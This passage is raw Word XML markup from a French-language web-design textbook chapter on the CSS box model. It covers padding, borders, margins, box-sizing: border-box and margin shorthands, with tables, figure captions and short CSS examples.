      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), la bordure et la marge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f18.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.18 — Les quatre couches d'une boîte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une boîte complète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.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 320px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 1.5rem;          /* intérieur : 24 px de chaque côté */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 2px solid #c9d6e2;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin: 2rem auto;        /* extérieur : 32 px, centrage horizontal */</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.44 — Les quatre zones et leurs propriétés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174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Zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Propriétés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Couleur de fond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="189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Zone cliquable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Oui (via l'élément)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1890"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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Padding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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padding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>padding-inline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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189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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bordure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>border</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>outline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Couleur de la bordure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1890"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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Marge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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margin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin-block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Transparente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="189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r>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La marge est la seule zone qui n'appartient pas à l'élément : elle sépare, mais ne reçoit ni couleur ni clic. Confondre marge et remplissage produit des boutons dont la zone active est trop petite, ou des cartes dont le fond déborde.</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MODÈLE DE BOÎTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Règle de calcul qui détermine l'encombrement total d'un élément à partir de son contenu, de son remplissage, de ses bordures et de ses marges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.2 box-sizing : la décision structurante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Par défaut, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désigne la largeur du </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : ajouter 24 pixels de remplissage de chaque côté fait une boîte de 48 pixels plus large. Cette règle surprend, et casse les grilles en pourcentage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La règle universelle qui simplifie tous les calculs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Le comportement par défaut */</w:t>
        <w:br/>
        <w:t>.boite {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 300px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 20px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 2px solid;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Largeur réelle : 300 + 40 + 4 = 344 px */</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Le comportement attendu par presque tout le monde */</w:t>
        <w:br/>
        <w:t>*, *::before, *::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-sizing: border-box;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.boite {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 300px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 20px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 2px solid;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Largeur réelle : 300 px, contenu = 256 px */</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>TOUJOURS`BORDER-BOX`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Placez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>box-sizing: border-box</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur tous les éléments dès le début du projet. Cette seule ligne évite la majorité des débordements de grille et des largeurs incohérentes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2476500"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f19.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.19 — Deux modèles, deux résultats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.3 Marges, remplissages et raccourcis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les propriétés logiques (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin-inline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>padding-block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) remplacent progressivement les propriétés physiques (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin-left</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>padding-top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Elles s'adaptent au sens d'écriture : un site en arabe se met en page de droite à gauche sans feuille supplémentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.45 — Raccourcis de marges et propriétés logiques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05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Raccourci</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Équivalent logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin: 1rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4 côtés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin: 1rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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margin: 1rem 2rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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vertical / horizontal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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margin-block</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin-inline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin: 1rem 2rem 3rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>haut / horiz. / bas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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margin: 1rem 2rem 3rem 4rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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haut, droite, bas, gauche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
